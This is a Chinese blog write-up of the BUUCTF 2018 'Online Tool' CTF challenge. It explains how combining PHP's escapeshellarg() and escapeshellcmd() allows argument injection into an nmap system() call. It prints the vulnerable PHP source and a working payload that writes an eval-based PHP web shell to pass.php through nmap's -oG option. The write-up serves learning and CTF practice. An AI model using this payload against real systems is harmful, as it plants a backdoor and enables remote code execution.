[BUUCTF 2018]Online Tool(escapeshellarg+escapeshellcmd使用不当导致rce)

最新推荐文章于 2022-08-04 16:36:17 发布
最新推荐文章于 2022-08-04 16:36:17 发布
阅读量383 收藏 1
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/119674220
版权

参考谈escapeshellarg绕过与参数注入漏洞

函数作用

escapeshellarg()	给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号

escapeshellcmd() 	反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$\, \x0A 和 \xFF。 
					' 和 " 仅在不配对儿的时候被转义。

1、首先给用户输入的字符加单引号不一定能防止命令执行,可以看到我们-c 2被加上单引号后依旧被执行了

ping '-c 2' 127.0.0.1

在这里插入图片描述
2、然后如果escapeshellarg()函数使用双引号包裹的话也会造成命令执行
单引号包裹

 <?php
$cmd = escapeshellarg($_GET['cmd']);
echo system('$cmd');

在这里插入图片描述
双引号包裹

 <?php
$cmd = escapeshellarg($_GET['cmd']);
echo system("$cmd");

在这里插入图片描述
3、配对的单引号是不影响命令执行的

ping 127.0.0.1
等于
ping '127.0.'0.1''
ping ''127.0.''0.1''''

在这里插入图片描述

4、escapeshellarg()+escapeshellcmd()和一起使用会造成RCE问题
我们就用这道题来分析

 <?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);	
	 echo $host."<br>";
    $host = escapeshellcmd($host);
	 echo $host."<br>";
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

我们使用payload

http://127.0.0.1/test.php?host=’ <?php @eval($_POST[pass]);?> -oG pass.php ’

' <?php @eval($_POST[pass]);?> -oG pass.php '

经过escapeshellarg函数变成了
''\'' <?php @eval($_POST[pass]);?> -oG pass.php '\'''

经过escapeshellcmd函数变成了
''\\'' \<\?php @eval\(\$_POST\[pass\]\)\;\?\> -oG pass.php '\\'''

我们知道配对的单引号不影响命令执行,最后执行的命令为
nmap -T5 -sT -Pn --host-timeout 2 -F ''\\'' \<\?php @eval\(\$_POST\[pass\]\)\;\?\> -oG pass.php '\\'''

相当于
nmap -T5 -sT -Pn --host-timeout 2 -F \\ \<\?php @eval\(\$_POST\[pass\]\)\;\?\> -oG pass.php \\

在这里插入图片描述
在这里插入图片描述
结论:只要输入两个单引号就能实现逃过单引号限制

天问_Herbert555
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[红日安全]代码审计Day5 - escapeshellargescapeshellcmd使用不当
hongrisec的博客
03-31 719
点击订阅我们    和红日一起成长 让安全如此精彩   红日安全出品|转载请注明来源 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全) 本文由红日安全成员: l1nk3r...
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
东隅的博客
09-12 752
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
php escapeshellcmd,PHP escapeshellarg()+escapeshellcmd() 之殇
weixin_36368404的博客
03-11 346
Author: Hcamael, p0wd3r (知道创宇404安全实验室)Date: 2016-12-280x00 简介前两天爆出了 PHPMailer 小于 5.2.18 版本的 RCE 漏洞,官方在补丁中使用了escapeshellarg来防止注入参数,但有趣的是经过测试我们发现该补丁是可以被绕过的,并且攻击面可以延伸到更大而不仅仅是局限于这个应用。0x01 漏洞复现环境搭建Dockerfi...
[原题复现+审计][BUUCTF 2018]WEB Online Tool(escapeshellargescapeshellcmd使用不当导致rce)...
笑花大王
03-13 287
简介 原题复现:https://github.com/glzjin/buuctf_2018_online_tool (环境php5.6.40) 考察知识点:escapeshellargescapeshellcmd使用不当导致rce 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 简单审计 ...
day5-escapeshellargescapeshellcmd使用不当
qq_45951598的博客
01-09 2291
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结: Day 5 - postcard escapeshellcmd()函数 escapeshellarg()函数 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 小案列 可见两个函数配合使用就会导致多个参数的注入。 1、传入的参数是:172.17.0.2’ -v -d a=1 2、经过escapeshellarg处理后变成了’172.17.
php使用escapeshellarg时中文被过滤的解决方法
10-21
主要介绍了php使用escapeshellarg时中文被过滤的解决方法,测试后发现问题的原因是shell和apache php-cgi的运行环境不同引起的,需要的朋友可以参考下
node-php-escape-shell:基于php shell元字符的转义函数
06-04
安装 ...描述 逃生者 php_escapeshellarg() 在字符串周围... escapeshellarg() 为 php 原始的 escapeshellarg 函数添加了更多选项,isWindows - 添加以允许在 windows 操作系统中转义 linux 风格的参数,反之亦然。 escap
php参数过滤、数据过滤类
05-01
3)在使用系统函数时,必须使用escapeshellarg(),escapeshellcmd()参数去过滤,这样你也就可以放心的使用系统函数。 4)对于跨站,strip_tags(),htmlspecialchars()两个参数都不错,对于用户提交的的带有html和php的...
php参数过滤、数据过滤类.zip
07-11
3)在使用系统函数时,必须使用escapeshellarg(),escapeshellcmd()参数去过滤,这样你也就可以放心的使用系统函数。 4)对于跨站,strip_tags(),htmlspecialchars()两个参数都不错,对于用户提交的的带有...
escapeshellarg escapeshellcmd漏洞
a3320315的博客
01-31 1394
[BUUCTF 2018]Online [BUUCTF 2018]Onlineescapeshellarg绕过与参数注入漏洞 命令参数注入
BUUCTF 2018 Online Toolescapeshellargescapeshellcmd使用不当导致rce
qq_45521281的博客
05-20 1113
参考: 谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇 谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码: 这里用到escapeshellarg()、escapeshellcmd()两个函数: escapeshellargescapeshellarg() 将给字符串增加一
『PHP内核』PHP 7 escapeshellarg底层探究
Ho1aAs‘s Blog
10-22 814
文章目录escapeshellarg描述歧义静态调试PHP_FUNCTION(escapeshellarg)PHPAPI zend_string *php_escape_shell_arg(char *str)添加前面的引号跳过多字节字符PHP历史漏洞:GBK宽字节注入转义添加后面的引号检查结果有效性返回动态调试完 escapeshellarg描述 escapeshellarg把字符串转义为安全的shell参数 escapeshellarg(string $arg): string Linux:对传入的
一天一道ctf 第20天(escapeshellargescapeshellcmd
scrawman的博客
04-07 781
[强网杯 2019]高明的黑客 作者直接告诉我们源码备份在www.tar.gz,这样就不用扫网站目录了,省了不少时间。 靠当我没有说,这里面几千个文件,怪不得43M。那人工代码审计是不可能的了,只能靠跑脚本。这里观摩了一下网上大神写的脚本: https://blog.csdn.net/a3320315/article/details/102945940 主要是看一下脚本的思路,等以后有能力了再做一遍。 ...
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 1284
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1731
php命令执行基础与CTF例题分析
buuctfOnline tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3132
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
关于buu上的namp两道题
m0_55185160的博客
03-28 1928
关于buu上的namp两道题 这个是题目的源码 源码中只要用到了escapeshellarg()函数和escapeshellcmd()函数,经过搜索这两个函数我们来了解这两个函数: 看这些概念没看太懂,那么我们来实际测试一下,更容易理解些 经过 escapeshellarg 函数处理过的参数被拼凑成 shell 命令,并且被双引号包裹这样就会造成漏洞,这主要在于bash中双引号和单引号解析变量是有区别的。 在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这.
[BUUCTF 2018]Online Tool
D.MIND 的博客
03-13 167
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host);
escapeshellarg
最新发布
03-16
escapeshellarg是一个PHP函数,用于将字符串转义为安全的shell参数。它可以确保字符串中的特殊字符不会被shell解释为命令或选项。这个函数通常用于构建shell命令行参数,以避免命令注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值